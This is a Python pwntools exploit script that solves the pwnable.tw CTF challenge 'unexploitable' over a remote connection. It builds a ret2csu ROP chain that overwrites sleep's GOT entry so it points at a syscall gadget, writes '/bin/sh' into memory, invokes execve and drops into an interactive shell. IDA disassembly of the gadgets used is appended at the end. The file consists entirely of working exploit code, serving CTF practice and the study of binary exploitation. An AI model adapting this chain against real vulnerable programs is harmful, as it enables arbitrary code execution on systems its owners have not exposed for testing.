from pwn import *
from libs.NAUP_pwn_lib import *
import time
from libs.NAUP_filestructure_lib import *
from libs.NAUP_fmt_lib import *

def s(payload): return r.send(payload)
def sl(payload): return r.sendline(payload)
def sla(after, payload): return r.sendlineafter(after, payload)
def sa(after, payload): return r.sendafter(after, payload)
def rc(num): return r.recv(num)
def rcl(): return r.recvline()
def rcls(num): return r.recvlines(num)
def rcu(payload): return r.recvuntil(payload)
def ita(): return r.interactive()
def cl(): return r.close()
def tsl(): return time.sleep(0.2)

x64_env()

REMOTE_LOCAL=input("local?(y/n):")

if REMOTE_LOCAL=="y":
    r=process('./unexploitable')
    debug_init()
    
else:                                           
    REMOTE_INFO=split_nc("nc chall.pwnable.tw 10403")

    REMOTE_IP=REMOTE_INFO[0]
    REMOTE_PORT=int(REMOTE_INFO[1])

    r=remote(REMOTE_IP,REMOTE_PORT)

### attach
if input('attach?(y/n)') == 'y':
    p(r)

### exploit
def csu_gadget_gen(rsp0,rsp8,rsp10,rsp18,rsp20,rsp28,rsp30):
        #     0           rbx         rbp          r12        r13(edi)     r14(rsi)    r15(rdx)
    return p64(rsp0) + p64(rsp8) + p64(rsp10) + p64(rsp18) + p64(rsp20) + p64(rsp28) + p64(rsp30)

csu_gadget_1 = 0x4005E6
csu_gadget_2 = 0x4005D0

sleep_got = 0x601010
read_got = 0x601000

binsh = 0x601400
# change sleep got to syscall gadget
ret2csu_payload = b'a'*(0x10+0x8)+p64(csu_gadget_1) +csu_gadget_gen(0x0, 0x0, 0x1, read_got, 0 , sleep_got, 1)+p64(csu_gadget_2)
# write binsh and rax to 0x3b
ret2csu_payload += csu_gadget_gen(0x0, 0x0, 0x1, read_got, 0 , binsh, 59)+p64(csu_gadget_2)
# call syscall and set rdx rdi rsi
ret2csu_payload += csu_gadget_gen(0x0, 0x0, 0x1, sleep_got, binsh , 0, 0)+p64(csu_gadget_2)

sl(ret2csu_payload)
time.sleep(3)
s(b'\x55')
time.sleep(1)
s(b'/bin/sh\x00'+b'a'*(59-len(b'/bin/sh\x00')))

NAUPINFO('BINSH',hex(binsh))
### interactive
ita()

'''
.text:00000000004005D0
.text:00000000004005D0 loc_4005D0:                             ; CODE XREF: __libc_csu_init+64↓j
.text:00000000004005D0                 mov     rdx, r15
.text:00000000004005D3                 mov     rsi, r14
.text:00000000004005D6                 mov     edi, r13d
.text:00000000004005D9                 call    qword ptr [r12+rbx*8]
.text:00000000004005DD                 add     rbx, 1
.text:00000000004005E1                 cmp     rbx, rbp
.text:00000000004005E4                 jnz     short loc_4005D0
.text:00000000004005E6
.text:00000000004005E6 loc_4005E6:                             ; CODE XREF: __libc_csu_init+48↑j
.text:00000000004005E6                 mov     rbx, [rsp+38h+var_30]
.text:00000000004005EB                 mov     rbp, [rsp+38h+var_28]
.text:00000000004005F0                 mov     r12, [rsp+38h+var_20]
.text:00000000004005F5                 mov     r13, [rsp+38h+var_18]
.text:00000000004005FA                 mov      , [rsp+38h+var_10]
.text:00000000004005FF                 mov     r15, [rsp+38h+var_8]
.text:0000000000400604                 add     rsp, 38h
'''

# 0x00000000000cb650 : mov eax, 0x25 ; syscall